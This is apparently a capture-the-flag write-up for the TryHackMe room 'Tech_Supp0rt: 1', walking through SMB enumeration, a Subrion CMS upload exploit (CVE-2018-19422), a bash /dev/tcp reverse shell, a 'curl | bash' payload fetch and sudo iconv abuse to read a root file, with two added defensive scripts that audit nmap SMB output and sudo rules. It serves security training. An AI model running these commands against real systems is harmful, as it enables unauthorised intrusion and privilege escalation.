THM Writeup – Tech_Supp0rt: 1

Hack into the scammer’s under-development website to foil their plans

Room: Tech_Supp0rt: 1

Difficulty: Easy

Operating System: Linux

Author: Vikaran

Hack into the machine and investigate the target.
Note: The theme and security warnings encountered in this room are part of the challenge.

Add IP address to your hosts file:

echo '10.10.172.7    tech.thm' >> /etc/hosts

Scan the target machine – find open ports first:

nmap -n -Pn -sS -p- --open --min-rate 5000 -vvv tech.thm

PORT    STATE SERVICE      REASON
22/tcp  open  ssh          syn-ack ttl 64
80/tcp  open  http         syn-ack ttl 64
139/tcp open  netbios-ssn  syn-ack ttl 64
445/tcp open  microsoft-ds syn-ack ttl 64

Get more details about open ports:

nmap -T4 -A -p 22,80,139,445 tech.thm

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA)
|   256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA)
|_  256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (EdDSA)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 02:CA:6E:F1:0E:ED (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.13
OS details: Linux 3.13
Network Distance: 1 hop
Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: techsupport
|   NetBIOS computer name: TECHSUPPORT\x00
|   Domain name: \x00
|   FQDN: techsupport
|_  System time: 2022-05-04T11:19:24+05:30
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-05-04 06:49:26
|_  start_date: 1600-12-31 23:58:45

We have four open ports: 22 (SSH – Secure Shell), 80 (HTTP – Apache web server), 139 (NetBIOS session service) and 445 (SMB – Samba share).

We cannot do anything with SSH yet, and port 80 serves only the Apache2 Ubuntu default page – I checked the page source and found nothing, so the next step is to enumerate Samba.
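Before moving on, here is how the SMB findings in the nmap output above can be pulled out automatically. This is an added example, not code from the writeup or the room: it parses the "| script-name:" blocks that nmap -A prints (the sample input is a constructed, trimmed copy of the host-script block above) and turns the guest session and the signing settings into findings with the smb.conf remediation a defender would apply.

```python
"""Flag SMB hardening gaps from nmap NSE script output.

Added example (not from the writeup): parses the '| script-name:' blocks
that 'nmap -A' prints and reports the settings a defender would fix.
"""
import re

# Constructed sample: a trimmed copy of the host-script block in the scan above.
SAMPLE_NMAP_OUTPUT = """\
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: techsupport
|_  System time: 2022-05-04T11:19:24+05:30
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
"""

HEADER = re.compile(r"^\| ([a-z0-9-]+):\s*$")       # '| smb-security-mode: '
ONE_LINER = re.compile(r"^\|_([a-z0-9-]+): (.*)$")  # '|_clock-skew: mean: ...'
NESTED = re.compile(r"^\|[_ ]\s+(\S.*?)\s*$")        # '|   account_used: guest'


def parse_nse_scripts(text):
    """Return {script_name: [detail lines]} for every NSE block in the output."""
    scripts = {}
    current = None
    for raw in text.splitlines():
        m = HEADER.match(raw)
        if m:
            current = m.group(1)
            scripts[current] = []
            continue
        m = ONE_LINER.match(raw)
        if m:
            scripts[m.group(1)] = [m.group(2).strip()]
            current = None
            continue
        m = NESTED.match(raw)
        if m and current is not None:
            scripts[current].append(m.group(1))
            continue
        current = None  # any other line ends the current block
    return scripts


def smb_findings(scripts):
    """Map the parsed smb*-security-mode blocks to findings with a remediation hint."""
    findings = []
    for line in scripts.get("smb-security-mode", []):
        key, _, value = line.partition(": ")
        if key == "account_used" and value == "guest":
            findings.append("null/guest session accepted: anonymous share and user "
                            "enumeration possible; set 'map to guest = never' and "
                            "'restrict anonymous = 2' in smb.conf")
        if key == "message_signing" and value.startswith("disabled"):
            findings.append("SMB1 message signing disabled: traffic can be relayed "
                            "or tampered with; set 'server signing = mandatory'")
    for line in scripts.get("smb2-security-mode", []):
        if "not required" in line.lower():
            findings.append("SMB2 signing not required: same fix, "
                            "'server signing = mandatory'")
    return findings


if __name__ == "__main__":
    for finding in smb_findings(parse_nse_scripts(SAMPLE_NMAP_OUTPUT)):
        print("[!]", finding)
```

Feed it the real scan with parse_nse_scripts(open("scan.txt").read()) and the three findings it raises on this box are exactly the ones the rest of the writeup exploits: the guest session is what lets enum4linux and smbmap list the websvr share anonymously.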

Enumeration

Download enum4linux, a tool used to enumerate SMB shares on both Windows and Linux systems, and make it executable:

wget https://raw.githubusercontent.com/CiscoCXSecurity/enum4linux/master/enum4linux.pl
chmod +x enum4linux.pl

List possible users:

root@attackbox:~# ./enum4linux.pl -U tech.thm
WARNING: polenum is not in your path.  Check that package is installed and your PATH is sane.
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed May  4 06:59:49 2022

 =========================================( Target Information )=========================================

Target ........... tech.thm
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==============================( Enumerating Workgroup/Domain on tech.thm )==============================


[E] Can't find workgroup/domain



 =====================================( Session Check on tech.thm )=====================================


[+] Server tech.thm allows sessions using username '', password ''


 ==================================( Getting domain SID for tech.thm )==================================

Domain Name: WORKGROUP
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup


 =========================================( Users on tech.thm )=========================================

Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.

Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.

As we can see, the server allows sessions without a username and password (a null session).

List remote shares using smbmap:

root@attackbox:~# smbmap.py -H tech.thm -u anonymous

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com   
                     https://github.com/ShawnDEvans/smbmap

                                                                                                    
[+] IP: tech.thm:445	Name: unknown             	Status: Guest session   
        Disk                                                  	Permissions	Comment
    ----                                                  	-----------	-------
    print$                                            	NO ACCESS	Printer Drivers
    websvr                                            	READ ONLY	
    IPC$                                              	NO ACCESS	IPC Service (TechSupport server (Samba, Ubuntu))

Now connect to the websvr share:

root@attackbox:~# smbclient //tech.thm/websvr
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \>

Instead of typing a password, hit ENTER.

List the files and download what you find:

smb: \> ls
  .                                   D        0  Sat May 29 08:17:38 2021
  ..                                  D        0  Sat May 29 08:03:47 2021
  enter.txt                           N      273  Sat May 29 08:17:38 2021

        8460484 blocks of size 1024. 5700016 blocks available
smb: \> get enter.txt
getting file \enter.txt of size 273 as enter.txt (44.4 KiloBytes/sec) (average 44.4 KiloBytes/sec)

Open another terminal window and read enter.txt:

root@attackbox:~# cat enter.txt 
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|->admin:[REDACTED][cooked with magical formula]
Wordpress creds
|->

Look at point 2 – there may be more web apps on port 80.

Brute-force directories on the web application:

root@attackbox:~# gobuster dir -u http://tech.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html
===============================================================
/index.html (Status: 200)
/wordpress (Status: 301)
/test (Status: 301)
/phpinfo.php (Status: 200)
/server-status (Status: 403)
===============================================================

While the enumeration was running I tried to browse to http://tech.thm/subrion and was redirected to http://10.0.2.15/subrion/subrion/ – that IP address is not the target box's!

Then I read point 2 again – “Fix subrion site, /subrion doesn’t work, edit from panel” – and tried http://tech.thm/subrion/panel, which worked:

subrion admin panel

To log in I tried the credentials we found in enter.txt earlier:

subrion admin panel - failed login

No luck; however, there is a note next to the credentials – “cooked with magical formula” – so the password is probably encoded somehow.

I used CyberChef’s Magic recipe to decode the password:

CyberChef - Magic

Then try to log in again:

subrion dashboard

Exploitation

At this point I looked around a bit but found nothing interesting, so I searched for a Subrion CMS 4.2.1 exploit:

subrion cms 4.2.1 exploit search results

And found an Arbitrary File Upload exploit:

subrion cms 4.2.1 arbitrary file upload

Copy the exploit into a file named e.g. exploit.py and make it executable:

chmod +x exploit.py

Install BeautifulSoup4 (the exploit uses it):

pip install BeautifulSoup4

Now run the exploit:

root@attackbox:~# python3 exploit.py -u http://tech.thm/subrion/panel/ -l admin -p Scam2021
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 

[+] Trying to connect to: http://tech.thm/subrion/panel/
[+] Success!
[+] Got CSRF token: PKtaiV4Gn6G9opwIn6OpxWPZ5l0nRtdYNwuzohte
[+] Trying to log in...
[+] Login Successful!

[+] Generating random name for Webshell...
[+] Generated webshell name: vwroruadxssgzgz

[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://tech.thm/subrion/panel/uploads/vwroruadxssgzgz.phar 

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$

And we have RCE.

Open another terminal window and start a netcat listener:

nc -lnvp 4242

Create a file named shell.sh with this content:

bash -i >& /dev/tcp/10.10.121.191/4242 0>&1

Edit the IP address and port to match your attacking machine.

Start a Python web server:

python3 -m http.server

Go back to the RCE terminal window, then download and execute shell.sh:

curl 10.10.121.191:8000/shell.sh | bash

And we receive a reverse shell:

reverse shell

Upgrade the shell:

python3 -c 'import pty;pty.spawn("/bin/bash");'
CTRL+Z
stty raw -echo; fg ENTER ENTER
stty rows 30 columns 100
export TERM=xterm-256color

Now look around:

www-data@TechSupport:/var/www/html/subrion/uploads$ ls -la /home/
total 12
drwxr-xr-x  3 root     root     4096 May 28  2021 .
drwxr-xr-x 23 root     root     4096 May 28  2021 ..
drwxr-xr-x  4 scamsite scamsite 4096 May 29  2021 scamsite
www-data@TechSupport:/var/www/html/subrion/uploads$ cd /home/scamsite/
www-data@TechSupport:/home/scamsite$ ls -lA
total 24
-rw------- 1 scamsite scamsite  151 May 28  2021 .bash_history
-rw-r--r-- 1 scamsite scamsite  220 May 28  2021 .bash_logout
-rw-r--r-- 1 scamsite scamsite 3771 May 28  2021 .bashrc
drwx------ 2 scamsite scamsite 4096 May 28  2021 .cache
-rw-r--r-- 1 scamsite scamsite  655 May 28  2021 .profile
-rw-r--r-- 1 scamsite scamsite    0 May 28  2021 .sudo_as_admin_successful
drwxr-xr-x 2 root     root     4096 May 29  2021 websvr

OK, there are only two users on this machine: root and scamsite. Looking back at gobuster’s results, there is a WordPress site, so let’s find the wp-config.php file – it may contain saved credentials:

www-data@TechSupport:/home/scamsite$ find / -type f -name "wp-config.php" 2>/dev/null
/var/www/html/wordpress/wp-config.php

Open the file and look for credentials:

wordpress config file

We now have the database username and password.

Let’s try to switch to user scamsite using the database password we just found:

www-data@TechSupport:/home/scamsite$ su scamsite       
Password: 
scamsite@TechSupport:~$

Bingo, we are now user scamsite – this shows how dangerous password reuse is…

To read the root flag we have to escalate privileges – try the basic vectors first, starting with what our user can run with sudo:

scamsite@TechSupport:~$ sudo -l
Matching Defaults entries for scamsite on TechSupport:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv
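An entry like the iconv rule above is exactly what a periodic sudoers audit should catch. The following is an added example, not code from the writeup or the room: it parses the rule lines that sudo -l prints and flags NOPASSWD entries and binaries that can read or write arbitrary files when run as root. The sample input is constructed (the writeup's iconv rule plus a hypothetical second rule), and the watch list holds only iconv; a real audit would populate it from GTFOBins' file-read and file-write categories.

```python
"""Audit 'sudo -l' output for rules that deserve review.

Added example (not from the writeup): parses the '(runas) TAG: command'
lines that 'sudo -l' prints and flags NOPASSWD entries and binaries that
give arbitrary file read/write as the run-as user.
"""
import os
import re

# Constructed sample: the writeup's iconv rule plus a hypothetical second rule.
SAMPLE_SUDO_L = r"""
Matching Defaults entries for scamsite on TechSupport:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv
    (root) /usr/sbin/service apache2 restart
"""

# Watch list of binaries that read/write arbitrary files when run as root.
# Only iconv (from the writeup) is listed here; populate this from GTFOBins'
# "file read" / "file write" categories in a real audit.
FILE_ACCESS_BINARIES = {"iconv"}

# Matches '(runas) TAG: TAG: command, command'; the tag group may be empty.
ENTRY = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(\S.*?)\s*$")


def parse_sudo_l(text):
    """Return a list of {'runas', 'nopasswd', 'command'} dicts from sudo -l output."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True      # everything after this header is a rule line
            continue
        if not in_rules:
            continue
        m = ENTRY.match(line)
        if not m:
            continue
        runas, tags, commands = m.groups()
        tagset = set(tags.replace(":", " ").split())
        for command in commands.split(", "):   # sudo -l joins several commands with ', '
            rules.append({"runas": runas.strip(),
                          "nopasswd": "NOPASSWD" in tagset,
                          "command": command.strip()})
    return rules


def audit_rules(rules, watchlist=FILE_ACCESS_BINARIES):
    """Return one finding string per rule that deserves review."""
    findings = []
    for rule in rules:
        command = rule["command"]
        if command == "ALL":
            findings.append(f"({rule['runas']}) ALL: unrestricted command set, "
                            f"this is full root access")
            continue
        words = command.split()
        binary = os.path.basename(words[0])
        if binary in watchlist and len(words) == 1:
            # No fixed arguments, so the caller chooses which files are read and written.
            findings.append(f"{command} as {rule['runas']}"
                            f"{' without a password' if rule['nopasswd'] else ''}: "
                            f"{binary} can read/write any file as root; remove the "
                            f"rule or pin its arguments")
        elif rule["nopasswd"]:
            findings.append(f"NOPASSWD on {command}: confirm it is needed and "
                            f"argument-locked")
    return findings


if __name__ == "__main__":
    for finding in audit_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print("[!]", finding)
```

Run it over `sudo -l` output collected from each host (for example by a configuration-management run) and the iconv rule is reported as arbitrary file read/write as root without a password, which is precisely the weakness the next step of the writeup uses; the argument-pinned service rule is left alone because sudo restricts it to that one command line.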

Use GTFOBins to find a way to exploit it:

gtfobins sudo iconv

Read the root flag:

scamsite@TechSupport:~$ sudo /usr/bin/iconv -f 8859_1 -t 8859_1 "/root/root.txt"
[REDACTED]  -
